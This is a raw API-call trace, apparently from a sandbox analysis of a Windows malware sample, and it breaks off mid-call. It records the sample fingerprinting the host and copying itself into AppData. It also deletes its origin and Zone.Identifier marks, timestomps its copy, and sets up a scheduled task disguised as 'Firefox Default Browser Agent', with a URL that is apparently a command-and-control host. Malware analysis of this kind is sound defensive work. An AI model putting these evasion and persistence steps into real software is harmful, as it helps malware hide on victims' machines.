Sleep (dwMilliseconds=0xa) [0087.175] Sleep (dwMilliseconds=0xa) [0087.190] Sleep (dwMilliseconds=0xa) [0087.239] Sleep (dwMilliseconds=0xa) [0087.261] Sleep (dwMilliseconds=0xa) [0087.268] Sleep (dwMilliseconds=0xa) [0087.286] Sleep (dwMilliseconds=0xa) [0087.310] Sleep (dwMilliseconds=0xa) [0087.315] Sleep (dwMilliseconds=0xa) [0087.331] Sleep (dwMilliseconds=0xa) [0087.346] Sleep (dwMilliseconds=0xa) [0087.362] Sleep (dwMilliseconds=0xa) [0087.415] Sleep (dwMilliseconds=0xa) [0087.439] Sleep (dwMilliseconds=0xa) [0087.440] Sleep (dwMilliseconds=0xa) [0087.456] Sleep (dwMilliseconds=0xa) [0087.472] Sleep (dwMilliseconds=0xa) [0087.491] Sleep (dwMilliseconds=0xa) [0087.502] Sleep (dwMilliseconds=0xa) [0087.518] Sleep (dwMilliseconds=0xa) [0087.535] Sleep (dwMilliseconds=0xa) [0087.596] Sleep (dwMilliseconds=0xa) [0087.616] Sleep (dwMilliseconds=0xa) [0087.628] Sleep (dwMilliseconds=0xa) [0087.643] Sleep (dwMilliseconds=0xa) [0087.658] Sleep (dwMilliseconds=0xa) [0087.674] Sleep (dwMilliseconds=0xa) [0087.690] Sleep (dwMilliseconds=0xa) [0087.705] Sleep (dwMilliseconds=0xa) [0087.721] Sleep (dwMilliseconds=0xa) [0087.768] Sleep (dwMilliseconds=0xa) [0087.783] Sleep (dwMilliseconds=0xa) [0087.799] Sleep (dwMilliseconds=0xa) [0087.816] Sleep (dwMilliseconds=0xa) [0087.843] Sleep (dwMilliseconds=0xa) [0087.847] Sleep (dwMilliseconds=0xa) [0087.861] Sleep (dwMilliseconds=0xa) [0087.877] Sleep (dwMilliseconds=0xa) [0087.924] Sleep (dwMilliseconds=0xa) [0087.939] Sleep (dwMilliseconds=0xa) [0087.955] Sleep (dwMilliseconds=0xa) [0087.970] Sleep (dwMilliseconds=0xa) [0087.986] Sleep (dwMilliseconds=0xa) [0088.002] Sleep (dwMilliseconds=0xa) [0088.018] Sleep (dwMilliseconds=0xa) [0088.033] Sleep (dwMilliseconds=0xa) [0088.080] Sleep (dwMilliseconds=0xa) [0088.095] Sleep (dwMilliseconds=0xa) [0088.111] Sleep (dwMilliseconds=0xa) [0088.127] Sleep (dwMilliseconds=0xa) [0088.142] Sleep (dwMilliseconds=0xa) [0088.158] Sleep (dwMilliseconds=0xa) [0088.173] Sleep (dwMilliseconds=0xa) [0088.190] Sleep (dwMilliseconds=0xa) [0088.236] Sleep (dwMilliseconds=0xa) [0088.251] Sleep (dwMilliseconds=0xa) [0088.267] Sleep (dwMilliseconds=0xa) [0088.282] Sleep (dwMilliseconds=0xa) [0088.308] Sleep (dwMilliseconds=0xa) [0088.313] Sleep (dwMilliseconds=0xa) [0088.329] Sleep (dwMilliseconds=0xa) [0088.345] Sleep (dwMilliseconds=0xa) [0088.392] Sleep (dwMilliseconds=0xa) [0088.412] Sleep (dwMilliseconds=0xa) [0088.423] Sleep (dwMilliseconds=0xa) [0088.438] Sleep (dwMilliseconds=0xa) [0088.454] Sleep (dwMilliseconds=0xa) [0088.470] Sleep (dwMilliseconds=0xa) [0088.485] Sleep (dwMilliseconds=0xa) [0088.501] Sleep (dwMilliseconds=0xa) [0088.516] Sleep (dwMilliseconds=0xa) [0088.563] Sleep (dwMilliseconds=0xa) [0088.583] Sleep (dwMilliseconds=0xa) [0088.604] Sleep (dwMilliseconds=0xa) [0088.610] Sleep (dwMilliseconds=0xa) [0088.625] Sleep (dwMilliseconds=0xa) [0088.641] Sleep (dwMilliseconds=0xa) [0088.657] Sleep (dwMilliseconds=0xa) [0088.672] Sleep (dwMilliseconds=0xa) [0088.688] Sleep (dwMilliseconds=0xa) [0088.736] Sleep (dwMilliseconds=0xa) [0088.759] Sleep (dwMilliseconds=0xa) [0088.766] Sleep (dwMilliseconds=0xa) [0088.782] GetSystemDirectoryA (in: lpBuffer=0x6e6fdc0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0088.782] lstrcatW (in: lpString1="", lpString2="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" [0088.783] RtlGetVersion (in: lpVersionInformation=0x3900457 | out: lpVersionInformation=0x3900457*(dwOSVersionInfoSize=0x0, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0088.783] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x6e6fda8 | out: TokenHandle=0x6e6fda8*=0x1584) returned 1 [0088.784] GetTokenInformation (in: TokenHandle=0x1584, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x6e6fda0 | out: TokenInformation=0x0, ReturnLength=0x6e6fda0) returned 0 [0088.784] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x25) returned 0x7f512f0 [0088.784] GetTokenInformation (in: TokenHandle=0x1584, TokenInformationClass=0x19, TokenInformation=0x7f512f0, TokenInformationLength=0x1c, ReturnLength=0x6e6fda0 | out: TokenInformation=0x7f512f0, ReturnLength=0x6e6fda0) returned 1 [0088.784] GetSidSubAuthorityCount (pSid=0x7f51300*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x7f51301 [0088.784] GetSidSubAuthority (pSid=0x7f51300*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x7f51308 [0088.784] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f512f0) returned 0x25 [0088.785] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f512f0) returned 1 [0088.785] CloseHandle (hObject=0x1584) returned 1 [0088.785] GetComputerNameA (in: lpBuffer=0x6e6fe70, nSize=0x6e6feb0 | out: lpBuffer="Q9IATRKPRH", nSize=0x6e6feb0) returned 1 [0088.785] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x6e6fea0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x6e6fea0*=0x8443a5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0088.786] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x29) returned 0x7f512f0 [0088.786] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x14) returned 0x7f51330 [0088.786] wsprintfA (in: param_1=0x7f512f0, param_2="%s%08X%08X" | out: param_1="Q9IATRKPRH99FC78698443A5AF") returned 26 [0088.787] CryptAcquireContextA (in: phProv=0x6e6fdf8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x6e6fdf8*=0x3f7ea20) returned 1 [0088.789] CryptCreateHash (in: hProv=0x3f7ea20, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6e6fdf0 | out: phHash=0x6e6fdf0) returned 1 [0088.790] lstrlenA (lpString="Q9IATRKPRH99FC78698443A5AF") returned 26 [0088.790] CryptHashData (hHash=0x70c7330, pbData=0x7f512f0, dwDataLen=0x1a, dwFlags=0x0) returned 1 [0088.790] CryptGetHashParam (in: hHash=0x70c7330, dwParam=0x2, pbData=0x6e6fe00, pdwDataLen=0x6e6fe30, dwFlags=0x0 | out: pbData=0x6e6fe00, pdwDataLen=0x6e6fe30) returned 1 [0088.790] wsprintfA (in: param_1=0x390020c, param_2="%02X" | out: param_1="4B") returned 2 [0088.790] wsprintfA (in: param_1=0x390020e, param_2="%02X" | out: param_1="CD") returned 2 [0088.790] wsprintfA (in: param_1=0x3900210, param_2="%02X" | out: param_1="65") returned 2 [0088.790] wsprintfA (in: param_1=0x3900212, param_2="%02X" | out: param_1="9A") returned 2 [0088.790] wsprintfA (in: param_1=0x3900214, param_2="%02X" | out: param_1="D8") returned 2 [0088.790] wsprintfA (in: param_1=0x3900216, param_2="%02X" | out: param_1="F3") returned 2 [0088.790] wsprintfA (in: param_1=0x3900218, param_2="%02X" | out: param_1="47") returned 2 [0088.790] wsprintfA (in: param_1=0x390021a, param_2="%02X" | out: param_1="B5") returned 2 [0088.790] wsprintfA (in: param_1=0x390021c, param_2="%02X" | out: param_1="B4") returned 2 [0088.791] wsprintfA (in: param_1=0x390021e, param_2="%02X" | out: param_1="51") returned 2 [0088.791] wsprintfA (in: param_1=0x3900220, param_2="%02X" | out: param_1="91") returned 2 [0088.791] wsprintfA (in: param_1=0x3900222, param_2="%02X" | out: param_1="8C") returned 2 [0088.791] wsprintfA (in: param_1=0x3900224, param_2="%02X" | out: param_1="D8") returned 2 [0088.791] wsprintfA (in: param_1=0x3900226, param_2="%02X" | out: param_1="91") returned 2 [0088.791] wsprintfA (in: param_1=0x3900228, param_2="%02X" | out: param_1="C8") returned 2 [0088.791] wsprintfA (in: param_1=0x390022a, param_2="%02X" | out: param_1="23") returned 2 [0088.791] CryptDestroyHash (hHash=0x70c7330) returned 1 [0088.791] CryptReleaseContext (hProv=0x3f7ea20, dwFlags=0x0) returned 1 [0088.791] wsprintfA (in: param_1=0x390022c, param_2="%08X" | out: param_1="8443A5AF") returned 8 [0088.791] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f51330) returned 0x14 [0088.791] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f51330) returned 1 [0088.791] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f512f0) returned 0x29 [0088.792] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f512f0) returned 1 [0088.792] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0xe) returned 0x7f512f0 [0088.792] wsprintfA (in: param_1=0x3900dbe, param_2="%sFF" | out: param_1="4BCD659AD8F347B5B451918CD891C8238443A5AFFF") returned 42 [0088.792] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f512f0) returned 0xe [0088.792] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f512f0) returned 1 [0088.792] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned 0x1584 [0088.792] RtlGetLastWin32Error () returned 0x0 [0088.792] GetTickCount () returned 0xf7455d [0088.792] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x1008) returned 0x7f512f0 [0088.794] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x2e) returned 0x7f52300 [0088.794] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x6e6feb8 | out: phkResult=0x6e6feb8*=0x14f8) returned 0x0 [0088.794] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x14) returned 0x7f52340 [0088.794] RegQueryValueExA (in: hKey=0x14f8, lpValueName="svcVersion", lpReserved=0x0, lpType=0x0, lpData=0x6e6fe40, lpcbData=0x6e6fea0*=0x20 | out: lpType=0x0, lpData=0x6e6fe40*=0x0, lpcbData=0x6e6fea0*=0x20) returned 0x2 [0088.794] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52340) returned 0x14 [0088.794] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52340) returned 1 [0088.794] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x11) returned 0x7f52340 [0088.794] RegQueryValueExA (in: hKey=0x14f8, lpValueName="Version", lpReserved=0x0, lpType=0x0, lpData=0x6e6fe40, lpcbData=0x6e6fea0*=0x20 | out: lpType=0x0, lpData=0x6e6fe40*=0x38, lpcbData=0x6e6fea0*=0xf) returned 0x0 [0088.794] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52340) returned 0x11 [0088.794] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52340) returned 1 [0088.794] lstrlenA (lpString="8.0.7601.17514") returned 14 [0088.794] lstrlenA (lpString=".") returned 1 [0088.794] atoi (_Str="8") returned 8 [0088.794] RegCloseKey (hKey=0x14f8) returned 0x0 [0088.795] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52300) returned 0x2e [0088.795] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52300) returned 1 [0088.796] ObtainUserAgentString (in: dwOption=0x8, pszUAOut=0x7f512f0, cbSize=0x6e6fea0 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", cbSize=0x6e6fea0) returned 0x0 [0088.802] lstrlenA (lpString="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)") returned 183 [0088.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f512f0, cbMultiByte=184, lpWideCharStr=0x3900577, cchWideChar=368 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)") returned 184 [0088.802] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f512f0) returned 0x1008 [0088.803] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f512f0) returned 1 [0088.803] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x1008) returned 0x7f512f0 [0088.803] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x1c) returned 0x7f52300 [0088.803] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x7f512f0, nSize=0x105 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0088.803] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52300) returned 0x1c [0088.803] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52300) returned 1 [0088.803] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x16) returned 0x7f52300 [0088.803] wsprintfW (in: param_1=0x39007a6, param_2="%s\\%hs" | out: param_1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned 42 [0088.803] wsprintfW (in: param_1=0x3900bb6, param_2="%s\\%hs" | out: param_1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj") returned 42 [0088.803] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52300) returned 0x16 [0088.803] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52300) returned 1 [0088.803] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x26) returned 0x7f52300 [0088.804] lstrlenA (lpString="http://file-coin-host-12.com/") returned 29 [0088.804] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x7f52300, Length=0x1d) returned 0x57488b3e [0088.804] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52300) returned 0x26 [0088.804] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52300) returned 1 [0088.804] lstrcmpW (lpString1="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned 1 [0088.804] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0 [0088.804] CopyFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr"), bFailIfExists=0) returned 1 [0088.944] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe")) returned 1 [0088.952] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x12) returned 0x7f52300 [0088.952] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x2a) returned 0x7f52320 [0088.952] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x408) returned 0x7f52360 [0088.952] wsprintfW (in: param_1=0x7f52360, param_2="%s%s" | out: param_1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr:Zone.Identifier") returned 58 [0088.952] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr:Zone.Identifier" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr:zone.identifier")) returned 0 [0088.952] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52360) returned 0x408 [0088.953] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52360) returned 1 [0088.953] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52300) returned 0x12 [0088.953] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52300) returned 1 [0088.953] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52320) returned 0x2a [0088.954] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52320) returned 1 [0088.954] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x16) returned 0x7f52300 [0088.954] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x210) returned 0x7f52320 [0088.954] GetSystemDirectoryA (in: lpBuffer=0x7f52320, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0088.954] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0088.954] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2="advapi32.dll" | out: lpString1="C:\\Windows\\system32\\advapi32.dll") returned="C:\\Windows\\system32\\advapi32.dll" [0088.954] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr", dwFileAttributes=0x6) returned 1 [0088.954] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x14f8 [0088.954] GetFileAttributesExA (in: lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), fInfoLevelId=0x0, lpFileInformation=0x6e6fe10 | out: lpFileInformation=0x6e6fe10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe03daea9, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xe03daea9, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xb36110, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xd6200)) returned 1 [0088.955] SetFileTime (hFile=0x14f8, lpCreationTime=0x6e6fe14, lpLastAccessTime=0x6e6fe1c, lpLastWriteTime=0x6e6fe24) returned 1 [0088.955] CloseHandle (hObject=0x14f8) returned 1 [0088.955] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52320) returned 0x210 [0088.955] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52320) returned 1 [0088.955] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52300) returned 0x16 [0088.955] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52300) returned 1 [0088.955] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x418) returned 0x7f52300 [0088.955] lstrcatW (in: lpString1="", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" | out: lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" [0088.955] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x212) returned 0x7f52720 [0088.955] GetUserNameW (in: lpBuffer=0x7f52720, pcbBuffer=0x6e6fe50 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x6e6fe50) returned 1 [0088.956] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x10d) returned 0x7f52940 [0088.956] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x4c) returned 0x7f52a60 [0088.956] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x10d) returned 0x7f52ac0 [0088.956] wsprintfW (in: param_1=0x7f52940, param_2="Firefox Default Browser Agent %hs" | out: param_1="Firefox Default Browser Agent 4BCD659AD8F347B5") returned 46 [0088.956] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52ac0) returned 0x10d [0088.957] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52ac0) returned 1 [0088.957] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52a60) returned 0x4c [0088.957] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52a60) returned 1 [0088.957] CoCreateInstance (in: rclsid=0x3931010*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x3931000*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x6e6fce8 | out: ppv=0x6e6fce8*=0x10aab0) returned 0x0 [0088.958] TaskScheduler:ITaskService:Connect (This=0x10aab0, serverName=0x6e6fd60*(varType=0x0, wReserved1=0x390, wReserved2=0x0, wReserved3=0x0, varVal1=0x3935257, varVal2=0x0), user=0x6e6fd80*(varType=0x0, wReserved1=0x390, wReserved2=0x0, wReserved3=0x0, varVal1=0x3935257, varVal2=0x0), domain=0x6e6fd40*(varType=0x0, wReserved1=0x390, wReserved2=0x0, wReserved3=0x0, varVal1=0x3935257, varVal2=0x0), password=0x6e6fdc0*(varType=0x0, wReserved1=0x390, wReserved2=0x0, wReserved3=0x0, varVal1=0x3935257, varVal2=0x0)) returned 0x0 [0089.028] TaskScheduler:ITaskService:GetFolder (in: This=0x10aab0, Path="", ppFolder=0x6e6fd08 | out: ppFolder=0x6e6fd08*=0x126130) returned 0x0 [0089.029] ITaskFolder:DeleteTask (This=0x126130, Name="Firefox Default Browser Agent 4BCD659AD8F347B5", flags=0) returned 0x80070002 [0089.031] TaskScheduler:ITaskService:NewTask (in: This=0x10aab0, flags=0x0, ppDefinition=0x6e6fe20 | out: ppDefinition=0x6e6fe20*=0x12b920) returned 0x0 [0089.032] ITaskDefinition:get_RegistrationInfo (in: This=0x12b920, ppRegistrationInfo=0x6e6fd20 | out: ppRegistrationInfo=0x6e6fd20*=0x13f520) returned 0x0 [0089.032] IRegistrationInfo:put_Author (This=0x13f520, Author="kEecfMwgj") returned 0x0 [0089.032] IUnknown:Release (This=0x13f520) returned 0x1 [0089.032] ITaskDefinition:get_Settings (in: This=0x12b920, ppSettings=0x6e6fcf8 | out: ppSettings=0x6e6fcf8*=0x13f650) returned 0x0 [0089.032] ITaskSettings:put_StartWhenAvailable (This=0x13f650, StartWhenAvailable=1) returned 0x0 [0089.032] IUnknown:Release (This=0x13f650) returned 0x1 [0089.032] ITaskDefinition:get_Triggers (in: This=0x12b920, ppTriggers=0x6e6fd00 | out: ppTriggers=0x6e6fd00*=0x13f5e0) returned 0x0 [0089.032] ITriggerCollection:Create (in: This=0x13f5e0, Type=1, ppTrigger=0x6e6fe10 | out: ppTrigger=0x6e6fe10*=0x13fc70) returned 0x0 [0089.033] IUnknown:QueryInterface (in: This=0x13fc70, riid=0x3931030*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x6e6fcf0 | out: ppvObject=0x6e6fcf0*=0x13fc70) returned 0x0 [0089.033] ITrigger:get_Repetition (in: This=0x13fc70, ppRepeat=0x6e6fce0 | out: ppRepeat=0x6e6fce0*=0x12cbc0) returned 0x0 [0089.033] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x14) returned 0x7f52a60 [0089.033] IRepetitionPattern:put_Interval (This=0x12cbc0, Interval="PT10M") returned 0x0 [0089.054] ITrigger:put_Repetition (This=0x13fc70, Repetition=0x12cbc0) returned 0x0 [0089.054] IUnknown:Release (This=0x12cbc0) returned 0x1 [0089.054] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x30) returned 0x7f52a80 [0089.054] ITrigger:put_StartBoundary (This=0x13fc70, StartBoundary="1999-11-30T00:00:00") returned 0x0 [0089.054] IUnknown:Release (This=0x13fc70) returned 0x2 [0089.054] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52a80) returned 0x30 [0089.055] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52a80) returned 1 [0089.055] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52a60) returned 0x14 [0089.055] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52a60) returned 1 [0089.055] IUnknown:Release (This=0x13fc70) returned 0x1 [0089.055] ITriggerCollection:Create (in: This=0x13f5e0, Type=9, ppTrigger=0x6e6fe10 | out: ppTrigger=0x6e6fe10*=0x13feb0) returned 0x0 [0089.096] IUnknown:QueryInterface (in: This=0x13feb0, riid=0x3931020*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0x6e6fce0 | out: ppvObject=0x6e6fce0*=0x13feb0) returned 0x0 [0089.096] ILogonTrigger:put_UserId (This=0x13feb0, UserId="kEecfMwgj") returned 0x0 [0089.098] IUnknown:Release (This=0x13feb0) returned 0x2 [0089.098] IUnknown:Release (This=0x13feb0) returned 0x1 [0089.098] ITaskDefinition:get_Actions (in: This=0x12b920, ppActions=0x6e6fd10 | out: ppActions=0x6e6fd10*=0x10d790) returned 0x0 [0089.098] IActionCollection:Create (in: This=0x10d790, Type=0, ppAction=0x6e6fd28 | out: ppAction=0x6e6fd28*=0x13f7b0) returned 0x0 [0089.098] IUnknown:Release (This=0x10d790) returned 0x1 [0089.098] IUnknown:QueryInterface (in: This=0x13f7b0, riid=0x3931040*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, 